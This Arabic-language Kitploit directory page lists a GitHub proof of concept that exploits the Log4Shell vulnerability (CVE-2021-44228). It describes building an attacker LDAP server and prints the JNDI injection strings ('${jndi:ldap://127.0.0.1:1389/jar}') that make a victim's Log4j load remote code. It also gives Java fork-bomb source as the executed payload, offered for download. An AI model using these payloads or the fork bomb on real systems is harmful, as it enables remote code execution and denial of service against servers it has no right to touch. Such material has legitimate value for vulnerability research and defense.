Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
log4j-exploit-fork-bomb — 💣💥💀 إثبات المفهوم: مثال على تشغيل fork-bomb على خادم بعيد بسبب ثغرة CVE-2021-44228 | Kitploit
أدوات/GitHubGitHub/funcid/log4j-exploit-fork-bomb
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةتطوير الحمولات
GitHubfuncid/log4j-exploit-fork-bomb

log4j-exploit-fork-bomb

💣💥💀 إثبات المفهوم: مثال على تشغيل fork-bomb على خادم بعيد بسبب ثغرة CVE-2021-44228

عرض المستودع
1منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

log4j-exploit-with-fork-bomb

💣💥💀 إثبات المفهوم: مثال على تشغيل fork bomb على خادم بعيد بفضل الثغرة CVE-2021-44228

  1. نقوم بإنشاء خادم LDAP للمهاجم (وحدة server) والذي سيوفر تمثيلات النص والكود (وحدة payload)

  2. نقوم بإنشاء مثال ضحية (وحدة victim) ونمرر إلى Log4j السلسلة إصدار JRE <= 6u211, 7u201, 8u191 و 11.0.1

root@kitploit:~
${jndi:ldap://127.0.0.1:1389/anything}
${jndi:ldap://127.0.0.1:1389/jar}
  1. سيحصل تطبيق الضحية من خادم المهاجم على مصفوفة بايت وسيفسرها كسلسلة بديلة أو ككود قابل للتنفيذ (المعامل com.sun.jndi.ldap.object.trustURLCodebase = true)

  2. كمثال، سيكون الكود القابل للتنفيذ هو fork bomb (برنامج يقوم بتشغيل نسخ من نفسه مما يستهلك كل وقت المعالج)

root@kitploit:~
public class ForkBomb {

  public static void main(String... args) {
  
    Runtime.getRuntime().exec(new String[] {
        "javaw", 
        "-cp", 
        System.getProperty("java.class.path"), 
        "ForkBomb"
    });
  }
}
تنزيل الأداة